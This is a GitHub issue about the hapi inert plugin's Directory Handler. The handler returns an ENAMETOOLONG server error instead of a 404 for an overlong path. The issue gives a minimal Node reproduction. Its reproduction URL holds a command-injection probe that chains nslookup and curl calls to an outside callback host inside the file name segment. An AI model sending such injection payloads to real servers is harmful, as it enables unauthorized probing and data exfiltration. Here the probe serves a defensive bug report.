inert
inert copied to clipboard
hapijs
Error: Failed to open file: ENAMETOOLONG
Support plan
- is this issue currently blocking your project? (yes/no): no
- is this issue affecting a production system? (yes/no): yes
Context
- node version: 20.12.0
- module version with issue: 7.1.0
- last module version without issue: n/a
- environment (e.g. node, browser, native): node
- used with (e.g. hapi application, another framework, standalone, ...): hapi
- any other relevant information: n/a
What are you trying to achieve or the steps to reproduce?
Using the Directory Handler feature, we noticed server errors from possible traversal attacks on a static public folder. https://hapi.dev/tutorials/servingfiles/?lang=en_US#directoryhandler
To fix the issue, we had to remove the directory handler in favor of the File Handler options. Where then custom logic was added to check the request.params.
https://hapi.dev/tutorials/servingfiles/?lang=en_US#fileoptions
But I was wondering if this error can be gracefully handled by Inert while using the Directory Handler.
const Hapi = require('@hapi/hapi');
const Inert = require('@hapi/inert');
const server = Hapi.server({
port: 3000,
debug: { request: '*' },
});
(async () => {
await server.register([Inert]);
server.route({
method: 'GET',
path: '/{filename*}',
handler: {
directory: { path: 'public' },
},
});
await server.start();
})();
Make a GET request to:
http://localhost:3000/{{;(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)|(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)&(nslookup%20-q=cname%20hitkeomrgybdx4a46a.bxss.me||curl%20hitkeomrgybdx4a46a.bxss.me)}}swagger-ui-bundle.js
What was the result you got?
Error: Failed to open file: ENAMETOOLONG: name too long
What result did you expect?
Possibly a 404, similar to how other invalid paths are handled.
Issue still occurs using node@20 and @hapi/[email protected]. Update description to reflect changes.